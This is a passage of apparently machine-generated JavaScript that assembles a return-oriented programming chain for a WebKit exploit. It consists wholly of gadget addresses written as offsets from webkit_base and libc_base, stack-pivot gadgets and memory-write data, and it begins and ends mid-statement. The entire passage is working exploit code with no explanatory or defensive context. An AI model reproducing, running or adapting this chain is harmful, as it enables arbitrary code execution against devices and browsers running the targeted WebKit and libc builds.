//pop rsi ropchain+378384, //L7829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7827: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7828: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7829: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7830: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+378456, //L7832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7832: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+378584, //L7834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+378600, //L7835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+378568, //L7833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7833: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7834: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7835: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+378760, //L7839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+378728, //L7837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+378744, //L7838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7836: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7837: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7838: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7839: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi 
ropchain+378816, //L7841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7841: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+378944, //L7843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+378960, //L7844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+378928, //L7842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7842: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7843: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7844: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+379040, //L7845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+379056, //L7846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7845: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7846: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+379152, //L7848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+379136, //L7847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7847: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7848: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+379232, //L7849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7849: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L7850: db([108, 0]); // 0x6c set_gadget(libc_base+144605,); //pop rdi //L7851: db([108, 0]); // 0x6c set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+379376, //L7852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+379408, //L7854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+379392, //L7853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7852: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7853: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7854: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+379576, //L7856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+379592, //L7857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+379560, //L7855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7856: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7857: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+379704, //L7859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+379752, //L7862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+379720, //L7860 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7859: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7861: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7862: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+379864, //L7863+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+379856, //L7863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7863: db([0, 0]); // 0x0 set_gadgets([ ropchain+379880, //L7863+24 ropchain+381352, //L7858 libc_base+764760, //pop rsi ropchain+379920, //L7864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7864: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7866: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+380040, //L7869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+380024, //L7867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7867: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7869: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+380216, //L7872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+380232, //L7873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+380184, //L7870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+380200, //L7871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7870: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7871: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7872: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7873: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+380328, //L7875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+380312, //L7874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7874: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7875: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7876: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7877: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L7878: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+380528, //L7880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7880: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+380584, //L7881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7881: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+380720, //L7885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+380704, //L7884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7883: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7884: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7885: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+380784, //L7886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7886: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7888: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7890: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+380944, //L7893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+380928, //L7891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+381088, //L7896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+381056, //L7894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+381072, //L7895 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7894: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7896: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+381176, //L7898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7897: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7898: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+381232, //L7899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7901: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+381312, //L7903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7903: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L7858: libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7678: libc_base+764760, //pop rsi ropchain+381408, //L7905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7905: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7907: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+381528, //L7910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+381512, //L7908 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7908: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7910: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+381704, //L7913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+381720, //L7914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+381672, //L7911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+381688, //L7912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7911: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7912: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7913: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7914: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+381816, //L7916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+381800, //L7915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7915: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7916: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7917: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7918: db([7, 0]); // 0x7 set_gadget(libc_base+763368,); //pop rcx //L7919: db([7, 0]); // 0x7 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi 
]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+382016, //L7921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7921: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+382072, //L7922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7922: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+382208, //L7926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+382192, //L7925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7924: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7925: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7926: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+382272, //L7927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7929: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7931: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+382432, //L7934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+382416, //L7932 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7932: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7934: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+382576, //L7937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+382544, //L7935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+382560, //L7936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7937: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+382664, //L7939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7938: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7939: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+382720, //L7940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7940: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7942: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+382800, //L7944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+382880, //L7945 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7945: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7947: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+383000, //L7950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+382984, //L7948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7948: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7950: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+383080, //L7951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+383096, //L7952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7951: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7952: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+383256, //L7956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+383224, //L7954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+383240, //L7955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7953: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7954: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7956: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+383312, //L7958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7958: db([0, 0]); 
// 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+383440, //L7960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+383456, //L7961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+383424, //L7959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7959: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7960: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7961: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+383616, //L7965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+383584, //L7963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+383600, //L7964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7962: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7963: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7964: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7965: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+383672, //L7967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7967: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+383800, //L7969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+383816, //L7970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+383784, //L7968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L7968: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7969: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7970: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+383976, //L7974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+383944, //L7972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+383960, //L7973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7971: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7972: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7973: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7974: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+384032, //L7976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7976: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+384160, //L7978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+384176, //L7979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+384144, //L7977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7977: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7978: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7979: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+384256, //L7980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+384272, 
//L7981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7980: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7981: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+384368, //L7983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+384352, //L7982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7982: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7983: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+384448, //L7984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7985: db([104, 0]); // 0x68 set_gadget(libc_base+144605,); //pop rdi //L7986: db([104, 0]); // 0x68 set_gadgets([ webkit_base+15691302, 